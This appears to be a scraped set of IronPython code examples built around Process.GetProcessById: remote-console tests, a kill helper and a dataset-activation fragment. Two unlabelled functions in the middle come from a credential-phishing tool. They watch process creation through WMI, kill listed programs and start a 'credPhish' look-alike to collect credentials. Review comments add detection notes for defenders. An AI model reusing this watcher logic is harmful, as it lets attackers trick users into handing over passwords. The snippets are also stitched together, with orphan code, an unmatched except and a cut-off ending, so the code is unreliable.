Example #1
def test_remote_runtime_normal_exit():
    """Ending the console session must let the remote runtime process exit.

    Starts a remote console, looks up the runtime process it spawned,
    checks that the runtime is still alive, ends the session and then
    blocks until the runtime process is gone.
    """
    console = start_remote_console()
    _console_pid, runtime_pid = get_process_ids(console)
    remote_runtime = Process.GetProcessById(runtime_pid)

    # Precondition: the runtime must be running before the session is ended.
    still_running = not remote_runtime.HasExited
    Assert(still_running)

    console.End()
    # No timeout on purpose: the test passes only if this wait returns.
    remote_runtime.WaitForExit()
def ProcEventHandler(sender, e):
    """Event callback: terminate a watched process and start a replacement.

    Reads the event object from ``e.NewEvent``. When the ``Name`` of its
    ``TargetInstance`` is listed in ``WATCHLIST``, the process is killed by
    id, a ``credPhish`` object is built from the event, and the process held
    in its ``NewProcess`` attribute is started. ``sender`` is not used.

    NOTE(review): ``WATCHLIST`` and ``credPhish`` are defined outside this
    snippet. Judging by the name, ``credPhish`` prepares a look-alike process
    meant to collect credentials -- confirm against its definition.

    Defender view: the sequence visible here is a process-creation event for
    a watched image name, termination of that process by a different process,
    and then a new process started by the terminating process. Process
    creation/termination auditing (for example Windows Security events
    4688/4689 or Sysmon event IDs 1 and 5) records each step of it.
    """
    proc = e.NewEvent
    # Act only on processes whose image name is on the watch list.
    if proc['TargetInstance']['Name'] in WATCHLIST:
        # Terminate the process that has just been created.
        Process.GetProcessById(proc['TargetInstance']['ProcessId']).Kill()
        print "[+] KILL SUCCESS: {0}\t{1}".format(proc['TargetInstance']['ProcessId'], proc['TargetInstance']['CommandLine'])
        # Build the replacement from the same event data (helper not shown here).
        cp = credPhish(proc)
        print "[+] PROCESS SPAWNED: {0} {1}".format(cp.path, cp.NewProcess.StartInfo.Arguments)
        cp.NewProcess.Start()
        # The exit code is read directly after Start(); no wait happens in between.
        print "[!] PROCESS EXIT CODE: {0}".format(cp.NewProcess.ExitCode)
def procWatch():
    """Blocking loop: kill watched processes as they start and launch a replacement.

    While the module-level ``GOT_CRED`` is ``False``, waits on
    ``startWatch.WaitForNextEvent()``. For an event whose ``TargetInstance``
    ``Name`` is in ``WATCHLIST`` the process is killed by id and a
    ``credPhish`` object is built from the event; if that object has a
    ``NewProcess`` attribute the process is started and the current thread
    is then aborted.

    NOTE(review): ``startWatch``, ``WATCHLIST``, ``GOT_CRED`` and
    ``credPhish`` are defined outside this snippet. ``startWatch`` looks like
    a WMI process-creation event watcher -- confirm against its definition.

    Defender view: a long-lived script host that subscribes to process
    creation events and then kills and re-launches specific image names is
    unusual for benign software. Auditing of WMI event subscriptions and of
    process creation/termination (for example Sysmon event IDs 1 and 5)
    exposes this loop.
    """
    print "[*] Watching Process Creation for: {0}".format(", ".join(WATCHLIST))
    while GOT_CRED is False:
        try:
            # Blocks until the watcher delivers the next event.
            proc = startWatch.WaitForNextEvent()
            if proc['TargetInstance']['Name'] in WATCHLIST:
                # Terminate the process that has just been created.
                Process.GetProcessById(proc['TargetInstance']['ProcessId']).Kill()
                print "[+] KILL SUCCESS: {0}\t{1}".format(proc['TargetInstance']['ProcessId'], proc['TargetInstance']['CommandLine'])
                
                cp = credPhish(proc)
                # Start a replacement only when credPhish prepared one.
                if hasattr(cp, "NewProcess"):
                    cp.NewProcess.Start()
                    print "[+] PROCESS SPAWNED: {0}\t{1} {2}".format(cp.NewProcess.Id, cp.path, cp.NewProcess.StartInfo.Arguments)
                    #Process.GetCurrentProcess.Kill()
                    Thread.GetCurrentThread().Abort()
        except:
            # Bare except: any error raised above ends the loop without a message.
            break
Example #4
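def test_remote_server_restart():
    """Check that the console survives a killed runtime and starts a new one.

    Kills the remote runtime process behind a running remote console, waits
    for the console to report the termination, nudges the console, and then
    verifies that the console process id is unchanged while the runtime
    process id is different.
    """
    ipi = start_remote_console()
    consoleProcessId, remoteRuntimeProcessId = get_process_ids(ipi)
    runtimeProcess = Process.GetProcessById(remoteRuntimeProcessId)
    # Compare id with id. The original compared the Process object with the
    # console's integer id, which can never be equal, so it checked nothing.
    AreNotEqual(remoteRuntimeProcessId, consoleProcessId)

    runtimeProcess.Kill()
    runtimeProcess.WaitForExit()
    # The Process.Exited event is fired asynchronously and might take some
    # time to fire. Hence, we need to block for a known marker.
    ipi.EatToMarker("Remote runtime terminated")

    # We need to press Enter to nudge the old console out of the ReadLine...
    # The returned restart message is not inspected.
    ipi.ExecuteLine("", True)
    ipi.ReadError()

    consoleProcessId2, remoteRuntimeProcessId2 = get_process_ids(ipi)
    AreEqual(consoleProcessId, consoleProcessId2)
    # This is technically not 100% correct, as there is a small chance that
    # the process id gets reused by the operating system.
    AreNotEqual(remoteRuntimeProcessId, remoteRuntimeProcessId2)
    ipi.End()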
Example #5
def kill(pid):
    """Kill the process with the given id and block until it has exited.

    Looks the process up through ``CSharpProcess.GetProcessById``, requests
    termination, then polls ``HasExited`` every 0.1 s. There is no timeout:
    the call returns only once the process is reported as exited.
    """
    target = CSharpProcess.GetProcessById(pid)
    target.Kill()
    while True:
        if target.HasExited:
            return
        time.sleep(0.1)
    if processid != 0:
        print 'Pass: Dataset was activated successfully'
    else:
        print 'Fail: Dataset was not activated'
        sys.exit(1)
except System.Exception, e:
    print 'Fail: Dataset activation threw exception'
    print e.ToString()
    sys.exit(1)

# Deactivate dataset on local machine
try:
    childdataset.OnDeactivated += switchondeactivate

    # Grab the child process so that we can watch it
    process = Process.GetProcessById(processid)

    # Deactivate it
    childdataset.Deactivate()

    # Wait for the deactivate event
    deactivateevent.WaitOne(2 * 60 * 1000)

    # See if the child process is gone
    if not process.HasExited:
        process.WaitForExit(2 * 60 * 1000)

    if not process.HasExited:
        print 'Fail: Dataset was not deactivated'
        sys.exit(1)
    else: